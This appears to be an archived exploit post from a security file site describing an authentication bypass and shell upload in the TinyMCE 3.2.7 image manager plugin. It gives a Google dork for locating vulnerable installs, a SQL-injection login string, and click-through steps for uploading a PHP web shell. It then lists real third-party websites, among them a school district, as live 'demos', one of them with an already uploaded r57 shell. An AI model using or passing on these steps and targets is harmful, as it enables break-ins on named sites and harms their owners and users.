exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TinyMCE 3.2.7 SQL Injection / Shell Upload

TinyMCE 3.2.7 SQL Injection / Shell Upload
Posted Nov 5, 2013
Authored by KedAns-Dz

TinyMCE version 3.2.7 suffers from SQL injection bypass and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
SHA-256 | da157be90c213de25691605033cf76109eb9523b6e6b3a241e799fbda9a598d4

TinyMCE 3.2.7 SQL Injection / Shell Upload

Change Mirror Download

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

> Title : TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites

> Author : KedAns-Dz
+ E-mail : ked-h (@hotmail.com / @1337day.com)
+ FaCeb0ok : fb.me/Inj3ct0rK3d
+ TwiTter : @kedans

# Platform : PHP / WebApp
+ Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple

*************************************************************************/

# TinyMCE v3.2.7 or ..X is suffer from Multiple vuln's / bug :p
# Remote Attacker can bypassin auth and upload files , shell's etc...
# 1st try with this dork :
google dork : allinurl:/plugins/imagemanager/pages/im/index.html

# (1) how to bypass auth? =>
you can bypass auth by simple poc of bypassing like
site.tld/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
user & pass : '1'OR'1'
=+ demo's :
http://www.prodigy-school.ru/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
user : '1'OR'1'
pass : '1'OR'1'
http://www.erez-komarovsky.co.il/admin/login.php
user: 1' OR '1'='1
pass: 1' OR '1'='1

&& or ( if the simple poc d'nt workin after u access :
site.tld/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html )
clic rapidly of the button stop in browser for stop the redirction ;)

# (2) Upload Shell/Files .. (.txt .gif) or (.php by use temperData or http header :D ) =>

poc : site.tld/[path]/plugins/imagemanager/pages/im/index.html
and clic in ( upload / add / [+] ) button & upload what you need ;)
for ex:
shell after up : http://www.prodigy-school.ru/data/r57.txt

=+ Demo's:

http://www.allemandemusic.com.hostbaby.com/dashboard/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html
http://gesundheit-gt.de/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.yorkshiredales-stay.co.uk/maintain/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.erez-komarovsky.co.il/admin/include/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://freewb.hu/freewbr/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://volunteermckinney.galaxydigital.com/includes/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.eastpennsd.org/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.htm
http://209.18.48.74/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html

# Take care kid's & 1337day Fan's :D
# Ked is Back ^_^ <3

####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database.+>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
####

# 1337day.com id:[ 1337day-2013-21454 ]
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close